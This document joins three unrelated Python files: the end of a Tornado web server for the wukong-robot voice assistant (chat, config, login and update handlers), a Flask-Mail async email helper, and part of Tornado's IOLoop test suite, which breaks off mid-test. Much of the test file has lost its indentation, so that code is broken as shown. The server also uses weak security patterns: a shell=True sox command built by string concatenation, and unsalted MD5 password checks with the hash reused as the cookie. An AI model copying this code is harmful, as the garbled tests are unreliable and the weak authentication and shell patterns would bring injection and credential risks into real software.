            if "notices" in info:
                notices = info["notices"]
            self.render(
                "index.html", update_info=info, suggestion=suggestion, notices=notices
            )
        else:
            # Conversation not initialised yet: render the bare page.
            self.render("index.html")
class MessageUpdatesHandler(BaseHandler):
    """Long-polling request for new messages.

    Waits until new messages are available before returning anything.
    """

    async def post(self):
        if not self.validate(self.get_argument("validate", default=None)):
            res = {"code": 1, "message": "illegal visit"}
            self.write(json.dumps(res))
        else:
            cursor = self.get_argument("cursor", None)
            messages = conversation.getHistory().get_messages_since(cursor)
            while not messages:
                # Save the Future returned here so we can cancel it in
                # on_connection_close.
                self.wait_future = conversation.getHistory().cond.wait()
                try:
                    await self.wait_future
                except asyncio.CancelledError:
                    return
                messages = conversation.getHistory().get_messages_since(cursor)
            if self.request.connection.stream.closed():
                return
            res = {"code": 0, "message": "ok", "history": json.dumps(messages)}
            self.write(json.dumps(res))

    def on_connection_close(self):
        # Bug fix: wait_future only exists once post() has started waiting.
        # A client that disconnects before then must not raise AttributeError.
        wait_future = getattr(self, "wait_future", None)
        if wait_future is not None:
            wait_future.cancel()
class ChatHandler(BaseHandler):
    """Accept a text query or base64 wav voice clip and run the conversation."""

    def onResp(self, msg, audio, plugin):
        # Callback invoked by the conversation with the reply payload.
        logger.debug("response msg: {}".format(msg))
        res = {
            "code": 0,
            "message": "ok",
            "resp": msg,
            "audio": audio,
            "plugin": plugin,
        }
        self.write(json.dumps(res))

    def post(self):
        global conversation
        if self.validate(self.get_argument("validate", default=None)):
            if self.get_argument("type") == "text":
                query = self.get_argument("query")
                uuid = self.get_argument("uuid")
                if query == "":
                    res = {"code": 1, "message": "query text is empty"}
                    self.write(json.dumps(res))
                else:
                    conversation.doResponse(
                        query,
                        uuid,
                        onSay=lambda msg, audio, plugin: self.onResp(
                            msg, audio, plugin
                        ),
                    )
            elif self.get_argument("type") == "voice":
                voice_data = self.get_argument("voice")
                tmpfile = utils.write_temp_file(base64.b64decode(voice_data), ".wav")
                fname, suffix = os.path.splitext(tmpfile)
                nfile = fname + "-16k" + suffix
                # downsampling
                # NOTE(review): shell=True with an interpolated path; tmpfile
                # comes from write_temp_file (server-generated), but confirm
                # it can never contain shell metacharacters.
                soxCall = "sox " + tmpfile + " " + nfile + " rate 16k"
                subprocess.call([soxCall], shell=True, close_fds=True)
                utils.check_and_delete(tmpfile)
                conversation.doConverse(
                    nfile,
                    onSay=lambda msg, audio, plugin: self.onResp(msg, audio, plugin),
                )
            else:
                res = {"code": 1, "message": "illegal type"}
                self.write(json.dumps(res))
        else:
            res = {"code": 1, "message": "illegal visit"}
            self.write(json.dumps(res))
        self.finish()
class GetHistoryHandler(BaseHandler):
    """Return the cached chat history as JSON."""

    def get(self):
        global conversation
        if not self.validate(self.get_argument("validate", default=None)):
            self.write(json.dumps({"code": 1, "message": "illegal visit"}))
        else:
            payload = {
                "code": 0,
                "message": "ok",
                "history": json.dumps(conversation.getHistory().cache),
            }
            self.write(json.dumps(payload))
        self.finish()
class GetConfigHandler(BaseHandler):
    """Return the whole config text, or one value when ``key`` is given."""

    def get(self):
        if not self.validate(self.get_argument("validate", default=None)):
            res = {"code": 1, "message": "illegal visit"}
            self.write(json.dumps(res))
        else:
            key = self.get_argument("key", default="")
            res = ""
            if key == "":
                # No key requested: return the raw config text plus the
                # wake-word sensitivity used by the config page.
                res = {
                    "code": 0,
                    "message": "ok",
                    "config": config.getText(),
                    "sensitivity": config.get("sensitivity", 0.5),
                }
            else:
                res = {"code": 0, "message": "ok", "value": config.get(key)}
            self.write(json.dumps(res))
        self.finish()
class GetLogHandler(BaseHandler):
    """Return the last N lines of the robot log as JSON."""

    def get(self):
        if not self.validate(self.get_argument("validate", default=None)):
            res = {"code": 1, "message": "illegal visit"}
            self.write(json.dumps(res))
        else:
            # Bug fix: get_argument() returns a string while the default was
            # the int 200, so the two paths passed different types to
            # readLog(); normalize to int (presumably a line count — confirm).
            lines = int(self.get_argument("lines", default=200))
            res = {"code": 0, "message": "ok", "log": logging.readLog(lines)}
            self.write(json.dumps(res))
        self.finish()
class LogHandler(BaseHandler):
    """Render the log-viewer page (login required)."""

    def get(self):
        if self.isValidated():
            self.render("log.html")
        else:
            self.redirect("/login")
class OperateHandler(BaseHandler):
    """Remote operations endpoint; currently only ``restart`` is supported."""

    def post(self):
        global wukong
        if self.validate(self.get_argument("validate", default=None)):
            if self.get_argument("type") == "restart":
                res = {"code": 0, "message": "ok"}
                self.write(json.dumps(res))
                self.finish()
                # Give the response time to flush before restarting.
                time.sleep(3)
                wukong.restart()
            else:
                res = {"code": 1, "message": "illegal type"}
                self.write(json.dumps(res))
                self.finish()
        else:
            res = {"code": 1, "message": "illegal visit"}
            self.write(json.dumps(res))
            self.finish()
class ConfigHandler(BaseHandler):
    """View and update the YAML configuration."""

    def get(self):
        if not self.isValidated():
            self.redirect("/login")
        else:
            self.render("config.html", sensitivity=config.get("sensitivity"))

    def post(self):
        """Validate the submitted YAML text, then persist it via config.dump."""
        if self.validate(self.get_argument("validate", default=None)):
            configStr = self.get_argument("config")
            try:
                # Security fix: the payload arrives over HTTP, and
                # yaml.load without a Loader can construct arbitrary Python
                # objects. safe_load only parses plain YAML, which is all a
                # config file should contain.
                yaml.safe_load(configStr)
                config.dump(configStr)
                res = {"code": 0, "message": "ok"}
                self.write(json.dumps(res))
            except Exception:
                # Narrowed from a bare except so KeyboardInterrupt/SystemExit
                # are no longer swallowed.
                res = {"code": 1, "message": "YAML解析失败,请检查内容"}
                self.write(json.dumps(res))
        else:
            res = {"code": 1, "message": "illegal visit"}
            self.write(json.dumps(res))
        self.finish()
class DonateHandler(BaseHandler):
    """Fetch the donation page markdown from wukong-contrib and render it."""

    def get(self):
        if not self.isValidated():
            self.redirect("/login")
            return
        response = requests.get(
            "https://raw.githubusercontent.com/wzpan/wukong-contrib/master/docs/donate.md"
        )
        # Convert the fetched markdown to HTML for the template.
        html = markdown.markdown(
            response.text,
            extensions=["codehilite", "tables", "fenced_code", "meta", "nl2br", "toc"],
        )
        self.render("donate.html", content=html)
class QAHandler(BaseHandler):
    """View and edit the custom Q&A table backed by the anyq/solr service."""

    def get(self):
        if not self.isValidated():
            self.redirect("/login")
        else:
            content = ""
            with open(constants.getQAPath(), "r") as f:
                content = f.read()
            self.render("qa.html", content=content)

    def post(self):
        """Convert the submitted Q&A text to JSON and re-index it in solr."""
        if self.validate(self.get_argument("validate", default=None)):
            qaStr = self.get_argument("qa")
            qaJson = os.path.join(constants.TEMP_PATH, "qa_json")
            try:
                # Rebuild the solr collection: convert to JSON, clear the old
                # documents, then upload the new set.
                make_json.convert(qaStr, qaJson)
                solr_tools.clear_documents(
                    config.get("/anyq/host", "0.0.0.0"),
                    "collection1",
                    config.get("/anyq/solr_port", "8900"),
                )
                solr_tools.upload_documents(
                    config.get("/anyq/host", "0.0.0.0"),
                    "collection1",
                    config.get("/anyq/solr_port", "8900"),
                    qaJson,
                    10,
                )
                # Persist the raw text only after indexing succeeded.
                with open(constants.getQAPath(), "w") as f:
                    f.write(qaStr)
                res = {"code": 0, "message": "ok"}
                self.write(json.dumps(res))
            except Exception as e:
                logger.error(e)
                res = {"code": 1, "message": "提交失败,请检查内容"}
                self.write(json.dumps(res))
        else:
            res = {"code": 1, "message": "illegal visit"}
            self.write(json.dumps(res))
        self.finish()
class APIHandler(BaseHandler):
    """Render the API documentation fetched from the wukong-contrib repo."""

    def get(self):
        if not self.isValidated():
            self.redirect("/login")
        else:
            content = ""
            # NOTE(review): fetched over the network on every page view;
            # consider caching if this page is hit often.
            r = requests.get(
                "https://raw.githubusercontent.com/wzpan/wukong-contrib/master/docs/api.md"
            )
            content = markdown.markdown(
                r.text,
                extensions=[
                    "codehilite",
                    "tables",
                    "fenced_code",
                    "meta",
                    "nl2br",
                    "toc",
                ],
            )
            self.render("api.html", content=content)
class UpdateHandler(BaseHandler):
    """Trigger a self-update; restarts the process on success."""

    def post(self):
        global wukong
        if self.validate(self.get_argument("validate", default=None)):
            if wukong.update():
                res = {"code": 0, "message": "ok"}
                self.write(json.dumps(res))
                self.finish()
                # Let the response flush before the process restarts.
                time.sleep(3)
                wukong.restart()
            else:
                res = {"code": 1, "message": "更新失败,请手动更新"}
                self.write(json.dumps(res))
        else:
            res = {"code": 1, "message": "illegal visit"}
            self.write(json.dumps(res))
        self.finish()
class LoginHandler(BaseHandler):
    """Login form; checks username and md5(password) against the config."""

    def get(self):
        if self.isValidated():
            self.redirect("/")
        else:
            self.render("login.html", error=None)

    def post(self):
        # The stored "/server/validate" token is the md5 hex digest of the
        # account password.
        if self.get_argument("username") == config.get(
            "/server/username"
        ) and hashlib.md5(
            self.get_argument("password").encode("utf-8")
        ).hexdigest() == config.get(
            "/server/validate"
        ):
            # NOTE(review): leftover debug print; consider logger.info instead.
            print("success")
            self.set_secure_cookie("validation", config.get("/server/validate"))
            self.redirect("/")
        else:
            self.render("login.html", error="登录失败")
class LogoutHandler(BaseHandler):
    """Invalidate the auth cookie and return to the login page."""

    def get(self):
        if self.isValidated():
            # An empty cookie value fails isValidated(), so overwriting has
            # the same effect as clearing it.
            self.set_secure_cookie("validation", "")
            self.redirect("/login")
        # NOTE(review): an unauthenticated GET falls through with an empty
        # 200 response — possibly should redirect to /login too; confirm.
# Tornado application settings. cookie_secret signs the secure cookies and
# MUST be overridden in the config for any real deployment.
settings = {
    "cookie_secret": config.get(
        "/server/cookie_secret", "__GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__"
    ),
    "template_path": os.path.join(constants.APP_PATH, "server/templates"),
    "static_path": os.path.join(constants.APP_PATH, "server/static"),
    "login_url": "/login",
    "debug": False,
}
# URL routing table for the web UI and its JSON endpoints.
application = tornado.web.Application(
    [
        (r"/", MainHandler),
        (r"/login", LoginHandler),
        (r"/gethistory", GetHistoryHandler),
        (r"/chat", ChatHandler),
        (r"/chat/updates", MessageUpdatesHandler),
        (r"/config", ConfigHandler),
        (r"/getconfig", GetConfigHandler),
        (r"/operate", OperateHandler),
        (r"/getlog", GetLogHandler),
        (r"/log", LogHandler),
        (r"/logout", LogoutHandler),
        (r"/api", APIHandler),
        (r"/qa", QAHandler),
        (r"/upgrade", UpdateHandler),
        (r"/donate", DonateHandler),
        # Static serving of camera snapshots and generated audio files.
        (
            r"/photo/(.+\.(?:png|jpg|jpeg|bmp|gif|JPG|PNG|JPEG|BMP|GIF))",
            tornado.web.StaticFileHandler,
            {"path": config.get("/camera/dest_path", "server/static")},
        ),
        (
            r"/audio/(.+\.(?:mp3|wav|pcm))",
            tornado.web.StaticFileHandler,
            {"path": constants.TEMP_PATH},
        ),
        (r"/static/(.*)", tornado.web.StaticFileHandler, {"path": "server/static"}),
    ],
    **settings
)
def start_server(con, wk):
    """Store the shared conversation/wukong objects and run the web server.

    Blocks inside the tornado IOLoop, so it is meant to run on a dedicated
    thread (see run()). Does nothing when /server/enable is false.
    """
    global conversation, wukong
    conversation = con
    wukong = wk
    if config.get("/server/enable", False):
        port = config.get("/server/port", "5000")
        try:
            # Running off the main thread, so this thread needs its own
            # asyncio event loop before tornado can start.
            asyncio.set_event_loop(asyncio.new_event_loop())
            application.listen(int(port))
            tornado.ioloop.IOLoop.instance().start()
        except Exception as e:
            logger.critical("服务器启动失败: {}".format(e))
def run(conversation, wukong):
    """Launch the web server on a background thread (non-blocking)."""
    server_thread = threading.Thread(target=start_server, args=(conversation, wukong))
    server_thread.start()
|
email_.py | from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
    """Send *msg* via Flask-Mail; runs on a worker thread (see send_email).

    An application context must be pushed manually because worker threads
    do not inherit one from the request.
    """
    with app.app_context():
        mail.send(msg)
def send_email(to, subject, template, **kwargs):
    """Render *template* (.txt and .html variants) and email it to *to*.

    The send happens on a background thread; the started Thread is returned
    so callers may join() it if they need to wait.
    """
    app = current_app._get_current_object()
    full_subject = app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject
    message = Message(full_subject,
                      sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
    message.body = render_template(template + '.txt', **kwargs)
    message.html = render_template(template + '.html', **kwargs)
    sender_thread = Thread(target=send_async_email, args=[app, message])
    sender_thread.start()
    return sender_thread
ioloop_test.py | from concurrent.futures import ThreadPoolExecutor
from concurrent import futures
from collections.abc import Generator
import contextlib
import datetime
import functools
import socket
import subprocess
import sys
import threading
import time
import types
from unittest import mock
import unittest
from tornado.escape import native_str
from tornado import gen
from tornado.ioloop import IOLoop, TimeoutError, PeriodicCallback
from tornado.log import app_log
from tornado.testing import (
AsyncTestCase,
bind_unused_port,
ExpectLog,
gen_test,
setup_with_context_manager,
)
from tornado.test.util import (
ignore_deprecation,
skipIfNonUnix,
skipOnTravis,
)
from tornado.concurrent import Future
import typing
if typing.TYPE_CHECKING:
from typing import List # noqa: F401
class TestIOLoop(AsyncTestCase):
    def test_add_callback_return_sequence(self):
        # A callback returning {} or [] shouldn't spin the CPU, see Issue #1803.
        self.calls = 0

        loop = self.io_loop
        test = self
        old_add_callback = loop.add_callback

        def add_callback(self, callback, *args, **kwargs):
            # Count every scheduling request before delegating to the real
            # implementation, so a re-scheduling loop is detectable.
            test.calls += 1
            old_add_callback(callback, *args, **kwargs)

        loop.add_callback = types.MethodType(add_callback, loop)  # type: ignore
        loop.add_callback(lambda: {})  # type: ignore
        loop.add_callback(lambda: [])  # type: ignore
        loop.add_timeout(datetime.timedelta(milliseconds=50), loop.stop)
        loop.start()
        # More than a handful of calls would mean the loop kept re-adding them.
        self.assertLess(self.calls, 10)
    @skipOnTravis
    def test_add_callback_wakeup(self):
        # Make sure that add_callback from inside a running IOLoop
        # wakes up the IOLoop immediately instead of waiting for a timeout.
        def callback():
            self.called = True
            self.stop()

        def schedule_callback():
            self.called = False
            self.io_loop.add_callback(callback)
            # Store away the time so we can check if we woke up immediately
            self.start_time = time.time()

        self.io_loop.add_timeout(self.io_loop.time(), schedule_callback)
        self.wait()
        # Immediate wakeup: stop time must be within ~10ms of scheduling.
        self.assertAlmostEqual(time.time(), self.start_time, places=2)
        self.assertTrue(self.called)
    @skipOnTravis
    def test_add_callback_wakeup_other_thread(self):
        # Same as above, but the add_callback comes from a different thread
        # while the IOLoop is parked in its poll call.
        def target():
            # sleep a bit to let the ioloop go into its poll loop
            time.sleep(0.01)
            self.stop_time = time.time()
            self.io_loop.add_callback(self.stop)

        thread = threading.Thread(target=target)
        self.io_loop.add_callback(thread.start)
        self.wait()
        delta = time.time() - self.stop_time
        # Cross-thread add_callback must interrupt the poll promptly.
        self.assertLess(delta, 0.1)
        thread.join()
    def test_add_timeout_timedelta(self):
        # add_timeout accepts a datetime.timedelta deadline, not just floats.
        self.io_loop.add_timeout(datetime.timedelta(microseconds=1), self.stop)
        self.wait()
def test_multiple_add(self):
sock, port = bind_unused_port()
try:
self.io_loop.add_handler(
sock.fileno(), lambda fd, events: None, IOLoop.READ
)
# Attempting to add the same handler twice fails
# (with a platform-dependent exception)
self.assertRaises(
Exception,
self.io_loop.add_handler,
sock.fileno(),
lambda fd, events: None,
IOLoop.READ,
)
finally:
self.io_loop.remove_handler(sock.fileno())
sock.close()
def test_remove_without_add(self):
# remove_handler should not throw an exception if called on an fd
# was never added.
sock, port = bind_unused_port()
try:
self.io_loop.remove_handler(sock.fileno())
finally:
sock.close()
def test_add_callback_from_signal(self):
# cheat a little bit and just run this normally, since we can't
# easily simulate the races that happen with real signal handlers
self.io_loop.add_callback_from_signal(self.stop)
self.wait()
def test_add_callback_from_signal_other_thread(self):
# Very crude test, just to make sure that we cover this case.
# This also happens to be the first test where we run an IOLoop in
# a non-main thread.
other_ioloop = IOLoop()
thread = threading.Thread(target=other_ioloop.start)
thread.start()
other_ioloop.add_callback_from_signal(other_ioloop.stop)
thread.join()
other_ioloop.close()
def test_add_callback_while_closing(self):
# add_callback should not fail if it races with another thread
# closing the IOLoop. The callbacks are dropped silently
# without executing.
closing = threading.Event()
def target():
other_ioloop.add_callback(other_ioloop.stop)
other_ioloop.start()
closing.set()
other_ioloop.close(all_fds=True)
other_ioloop = IOLoop()
thread = threading.Thread(target=target)
thread.start()
closing.wait()
for i in range(1000):
other_ioloop.add_callback(lambda: None)
@skipIfNonUnix # just because socketpair is so convenient
def test_read_while_writeable(self):
# Ensure that write events don't come in while we're waiting for
# a read and haven't asked for writeability. (the reverse is
# difficult to test for)
client, server = socket.socketpair()
try:
def handler(fd, events):
self.assertEqual(events, IOLoop.READ)
self.stop()
self.io_loop.add_handler(client.fileno(), handler, IOLoop.READ)
self.io_loop.add_timeout(
self.io_loop.time() + 0.01, functools.partial(server.send, b"asdf")
)
self.wait()
self.io_loop.remove_handler(client.fileno())
finally:
client.close()
server.close()
def test_remove_timeout_after_fire(self):
# It is not an error to call remove_timeout after it has run.
handle = self.io_loop.add_timeout(self.io_loop.time(), self.stop)
self.wait()
self.io_loop.remove_timeout(handle)
def test_remove_timeout_cleanup(self):
# Add and remove enough callbacks to trigger cleanup.
# Not a very thorough test, but it ensures that the cleanup code
# gets executed and doesn't blow up. This test is only really useful
# on PollIOLoop subclasses, but it should run silently on any
# implementation.
for i in range(2000):
timeout = self.io_loop.add_timeout(self.io_loop.time() + 3600, lambda: None)
self.io_loop.remove_timeout(timeout)
# HACK: wait two IOLoop iterations for the GC to happen.
self.io_loop.add_callback(lambda: self.io_loop.add_callback(self.stop))
self.wait()
def test_remove_timeout_from_timeout(self):
calls = [False, False]
# Schedule several callbacks and wait for them all to come due at once.
# t2 should be cancelled by t1, even though it is already scheduled to
# be run before the ioloop even looks at it.
now = self.io_loop.time()
def t1():
calls[0] = True
self.io_loop.remove_timeout(t2_handle)
self.io_loop.add_timeout(now + 0.01, t1)
def t2():
calls[1] = True
t2_handle = self.io_loop.add_timeout(now + 0.02, t2)
self.io_loop.add_timeout(now + 0.03, self.stop)
time.sleep(0.03)
self.wait()
self.assertEqual(calls, [True, False])
def test_timeout_with_arguments(self):
# This tests that all the timeout methods pass through *args correctly.
results = [] # type: List[int]
self.io_loop.add_timeout(self.io_loop.time(), results.append, 1)
self.io_loop.add_timeout(datetime.timedelta(seconds=0), results.append, 2)
self.io_loop.call_at(self.io_loop.time(), results.append, 3)
self.io_loop.call_later(0, results.append, 4)
self.io_loop.call_later(0, self.stop)
self.wait()
# The asyncio event loop does not guarantee the order of these
# callbacks.
self.assertEqual(sorted(results), [1, 2, 3, 4])
def test_add_timeout_return(self):
# All the timeout methods return non-None handles that can be
# passed to remove_timeout.
handle = self.io_loop.add_timeout(self.io_loop.time(), lambda: None)
self.assertFalse(handle is None)
self.io_loop.remove_timeout(handle)
def test_call_at_return(self):
handle = self.io_loop.call_at(self.io_loop.time(), lambda: None)
self.assertFalse(handle is None)
self.io_loop.remove_timeout(handle)
def test_call_later_return(self):
handle = self.io_loop.call_later(0, lambda: None)
self.assertFalse(handle is None)
self.io_loop.remove_timeout(handle)
def test_close_file_object(self):
"""When a file object is used instead of a numeric file descriptor,
the object should be closed (by IOLoop.close(all_fds=True),
not just the fd.
"""
# Use a socket since they are supported by IOLoop on all platforms.
# Unfortunately, sockets don't support the .closed attribute for
# inspecting their close status, so we must use a wrapper.
class SocketWrapper(object):
def __init__(self, sockobj):
self.sockobj = sockobj
self.closed = False
def fileno(self):
return self.sockobj.fileno()
def close(self):
self.closed = True
self.sockobj.close()
sockobj, port = bind_unused_port()
socket_wrapper = SocketWrapper(sockobj)
io_loop = IOLoop()
io_loop.add_handler(socket_wrapper, lambda fd, events: None, IOLoop.READ)
io_loop.close(all_fds=True)
self.assertTrue(socket_wrapper.closed)
def test_handler_callback_file_object(self):
"""The handler callback receives the same fd object it passed in."""
server_sock, port = bind_unused_port()
fds = []
def handle_connection(fd, events):
fds.append(fd)
conn, addr = server_sock.accept()
conn.close()
self.stop()
self.io_loop.add_handler(server_sock, handle_connection, IOLoop.READ)
with contextlib.closing(socket.socket()) as client_sock:
client_sock.connect(("127.0.0.1", port))
self.wait()
self.io_loop.remove_handler(server_sock)
self.io_loop.add_handler(server_sock.fileno(), handle_connection, IOLoop.READ)
with contextlib.closing(socket.socket()) as client_sock:
client_sock.connect(("127.0.0.1", port))
self.wait()
self.assertIs(fds[0], server_sock)
self.assertEqual(fds[1], server_sock.fileno())
self.io_loop.remove_handler(server_sock.fileno())
server_sock.close()
def test_mixed_fd_fileobj(self):
server_sock, port = bind_unused_port()
def f(fd, events):
pass
self.io_loop.add_handler(server_sock, f, IOLoop.READ)
with self.assertRaises(Exception):
# The exact error is unspecified - some implementations use
# IOError, others use ValueError.
self.io_loop.add_handler(server_sock.fileno(), f, IOLoop.READ)
self.io_loop.remove_handler(server_sock.fileno())
server_sock.close()
def test_reentrant(self):
"""Calling start() twice should raise an error, not deadlock."""
returned_from_start = [False]
got_exception = [False]
def callback():
try:
self.io_loop.start()
returned_from_start[0] = True
except Exception:
got_exception[0] = True
self.stop()
self.io_loop.add_callback(callback)
self.wait()
self.assertTrue(got_exception[0])
self.assertFalse(returned_from_start[0])
def test_exception_logging(self):
"""Uncaught exceptions get logged by the IOLoop."""
self.io_loop.add_callback(lambda: 1 / 0)
self.io_loop.add_callback(self.stop)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
def test_exception_logging_future(self):
"""The IOLoop examines exceptions from Futures and logs them."""
@gen.coroutine
def callback():
self.io_loop.add_callback(self.stop)
1 / 0
self.io_loop.add_callback(callback)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
def test_exception_logging_native_coro(self):
"""The IOLoop examines exceptions from awaitables and logs them."""
async def callback():
# Stop the IOLoop two iterations after raising an exception
# to give the exception time to be logged.
self.io_loop.add_callback(self.io_loop.add_callback, self.stop)
1 / 0
self.io_loop.add_callback(callback)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
def test_spawn_callback(self):
# Both add_callback and spawn_callback run directly on the IOLoop,
# so their errors are logged without stopping the test.
self.io_loop.add_callback(lambda: 1 / 0)
self.io_loop.add_callback(self.stop)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
# A spawned callback is run directly on the IOLoop, so it will be
# logged without stopping the test.
self.io_loop.spawn_callback(lambda: 1 / 0)
self.io_loop.add_callback(self.stop)
with ExpectLog(app_log, "Exception in callback"):
self.wait()
@skipIfNonUnix
def test_remove_handler_from_handler(self):
# Create two sockets with simultaneous read events.
client, server = socket.socketpair()
try:
client.send(b"abc")
server.send(b"abc")
# After reading from one fd, remove the other from the IOLoop.
chunks = []
def handle_read(fd, events):
chunks.append(fd.recv(1024))
if fd is client:
self.io_loop.remove_handler(server)
else:
self.io_loop.remove_handler(client)
self.io_loop.add_handler(client, handle_read, self.io_loop.READ)
self.io_loop.add_handler(server, handle_read, self.io_loop.READ)
self.io_loop.call_later(0.1, self.stop)
self.wait()
# Only one fd was read; the other was cleanly removed.
self.assertEqual(chunks, [b"abc"])
finally:
client.close()
server.close()
@skipIfNonUnix
@gen_test
def test_init_close_race(self):
# Regression test for #2367
#
# Skipped on windows because of what looks like a bug in the
# proactor event loop when started and stopped on non-main
# threads.
def f():
for i in range(10):
loop = IOLoop(make_current=False)
loop.close()
yield gen.multi([self.io_loop.run_in_executor(None, f) for i in range(2)])
# Deliberately not a subclass of AsyncTestCase so the IOLoop isn't
# automatically set as current.
class TestIOLoopCurrent(unittest.TestCase):
    """Tests for the (deprecated) IOLoop.current()/make_current bookkeeping.

    Deliberately not an AsyncTestCase subclass so no IOLoop is made
    current automatically.
    """

    def setUp(self):
        # These tests exercise deprecated APIs; silence the warnings.
        setup_with_context_manager(self, ignore_deprecation())
        self.io_loop = None  # type: typing.Optional[IOLoop]
        IOLoop.clear_current()

    def tearDown(self):
        if self.io_loop is not None:
            self.io_loop.close()

    def test_default_current(self):
        self.io_loop = IOLoop()
        # The first IOLoop with default arguments is made current.
        self.assertIs(self.io_loop, IOLoop.current())
        # A second IOLoop can be created but is not made current.
        io_loop2 = IOLoop()
        self.assertIs(self.io_loop, IOLoop.current())
        io_loop2.close()

    def test_non_current(self):
        self.io_loop = IOLoop(make_current=False)
        # The new IOLoop is not initially made current.
        self.assertIsNone(IOLoop.current(instance=False))
        # Starting the IOLoop makes it current, and stopping the loop
        # makes it non-current. This process is repeatable.
        for i in range(3):

            def f():
                self.current_io_loop = IOLoop.current()
                assert self.io_loop is not None
                self.io_loop.stop()

            self.io_loop.add_callback(f)
            self.io_loop.start()
            self.assertIs(self.current_io_loop, self.io_loop)
        # Now that the loop is stopped, it is no longer current.
        self.assertIsNone(IOLoop.current(instance=False))

    def test_force_current(self):
        self.io_loop = IOLoop(make_current=True)
        self.assertIs(self.io_loop, IOLoop.current())
        with self.assertRaises(RuntimeError):
            # A second make_current=True construction cannot succeed.
            IOLoop(make_current=True)
        # current() was not affected by the failed construction.
        self.assertIs(self.io_loop, IOLoop.current())
class TestIOLoopCurrentAsync(AsyncTestCase):
    """Checks IOLoop.current bookkeeping from within a running loop."""

    def setUp(self):
        super().setUp()
        # These tests touch deprecated current-loop APIs; mute the warnings.
        setup_with_context_manager(self, ignore_deprecation())

    @gen_test
    def test_clear_without_current(self):
        # clear_current must be a harmless no-op when no IOLoop is current.
        # Run it on a fresh worker thread so the threading.Local storage
        # is observed in a pristine state.
        with ThreadPoolExecutor(1) as worker:
            yield worker.submit(IOLoop.clear_current)
class TestIOLoopFutures(AsyncTestCase):
    """Tests for IOLoop integration with concurrent.futures executors."""

    def test_add_future_threads(self):
        with futures.ThreadPoolExecutor(1) as pool:

            def dummy():
                pass

            # add_future should invoke the callback on the IOLoop thread
            # once the executor's future resolves.
            self.io_loop.add_future(
                pool.submit(dummy), lambda future: self.stop(future)
            )
            future = self.wait()
            self.assertTrue(future.done())
            self.assertTrue(future.result() is None)

    @gen_test
    def test_run_in_executor_gen(self):
        event1 = threading.Event()
        event2 = threading.Event()

        def sync_func(self_event, other_event):
            self_event.set()
            other_event.wait()
            # Note that return value doesn't actually do anything,
            # it is just passed through to our final assertion to
            # make sure it is passed through properly.
            return self_event

        # Run two synchronous functions, which would deadlock if not
        # run in parallel.
        res = yield [
            IOLoop.current().run_in_executor(None, sync_func, event1, event2),
            IOLoop.current().run_in_executor(None, sync_func, event2, event1),
        ]
        self.assertEqual([event1, event2], res)

    @gen_test
    def test_run_in_executor_native(self):
        event1 = threading.Event()
        event2 = threading.Event()

        def sync_func(self_event, other_event):
            self_event.set()
            other_event.wait()
            return self_event

        # Go through an async wrapper to ensure that the result of
        # run_in_executor works with await and not just gen.coroutine
        # (simply passing the underlying concurrent future would do that).
        async def async_wrapper(self_event, other_event):
            return await IOLoop.current().run_in_executor(
                None, sync_func, self_event, other_event
            )

        res = yield [async_wrapper(event1, event2), async_wrapper(event2, event1)]
        self.assertEqual([event1, event2], res)

    @gen_test
    def test_set_default_executor(self):
        count = [0]

        class MyExecutor(futures.ThreadPoolExecutor):
            # Counts submissions so we can verify the custom executor
            # was actually used by run_in_executor(None, ...).
            def submit(self, func, *args):
                count[0] += 1
                return super().submit(func, *args)

        event = threading.Event()

        def sync_func():
            event.set()

        executor = MyExecutor(1)
        loop = IOLoop.current()
        loop.set_default_executor(executor)
        yield loop.run_in_executor(None, sync_func)
        self.assertEqual(1, count[0])
        self.assertTrue(event.is_set())
class TestIOLoopRunSync(unittest.TestCase):
    """Tests for IOLoop.run_sync with plain functions, coroutines, and
    native coroutines."""

    def setUp(self):
        self.io_loop = IOLoop(make_current=False)

    def tearDown(self):
        self.io_loop.close()

    def test_sync_result(self):
        # A non-awaitable return value is rejected.
        with self.assertRaises(gen.BadYieldError):
            self.io_loop.run_sync(lambda: 42)

    def test_sync_exception(self):
        # Exceptions from a synchronous function propagate out of run_sync.
        with self.assertRaises(ZeroDivisionError):
            self.io_loop.run_sync(lambda: 1 / 0)

    def test_async_result(self):
        @gen.coroutine
        def f():
            yield gen.moment
            raise gen.Return(42)

        self.assertEqual(self.io_loop.run_sync(f), 42)

    def test_async_exception(self):
        # Exceptions raised after a yield point also propagate.
        @gen.coroutine
        def f():
            yield gen.moment
            1 / 0

        with self.assertRaises(ZeroDivisionError):
            self.io_loop.run_sync(f)

    def test_current(self):
        # Inside run_sync, this loop is the current one.
        def f():
            self.assertIs(IOLoop.current(), self.io_loop)

        self.io_loop.run_sync(f)

    def test_timeout(self):
        @gen.coroutine
        def f():
            yield gen.sleep(1)

        self.assertRaises(TimeoutError, self.io_loop.run_sync, f, timeout=0.01)

    def test_native_coroutine(self):
        @gen.coroutine
        def f1():
            yield gen.moment

        async def f2():
            await f1()

        self.io_loop.run_sync(f2)
class TestPeriodicCallbackMath(unittest.TestCase):
def simulate_calls(self, pc, durations):
"""Simulate a series of calls to the PeriodicCallback.
Pass a list of call durations in seconds (negative values
work to simulate clock adjustments during the call, or more or
less equivalently, between calls). This method returns the
times at which each call would be made.
"""
calls = []
now = 1000
pc._next_timeout = now
for d in durations:
pc._update_next(now)
calls.append(pc._next_timeout)
now = pc._next_timeout + d
return calls
def dummy(self):
pass
def test_basic(self):
pc = PeriodicCallback(self.dummy, 10000)
self.assertEqual(
self.simulate_calls(pc, [0] * 5), [1010, 1020, 1030, 1040, 1050]
)
def test_overrun(self):
# If a call runs for too long, we skip entire cycles to get
# back on schedule.
call_durations = [9, 9, 10, 11, 20, 20, 35, 35, 0, 0, 0]
expected = [
1010,
1020,
1030, # first 3 calls on schedule
1050,
1070, # next 2 delayed one cycle
1100,
1130, # next 2 delayed 2 cycles
1170,
1210, # next 2 delayed 3 cycles
1220,
1230, # then back on schedule.
]
pc = PeriodicCallback(self.dummy, 10000)
self.assertEqual(self.simulate_calls(pc, call_durations), expected)
def test_clock_backwards(self):
pc = PeriodicCallback(self.dummy, 10000)
# Backwards jumps are ignored, potentially resulting in a
# slightly slow schedule (although we assume that when
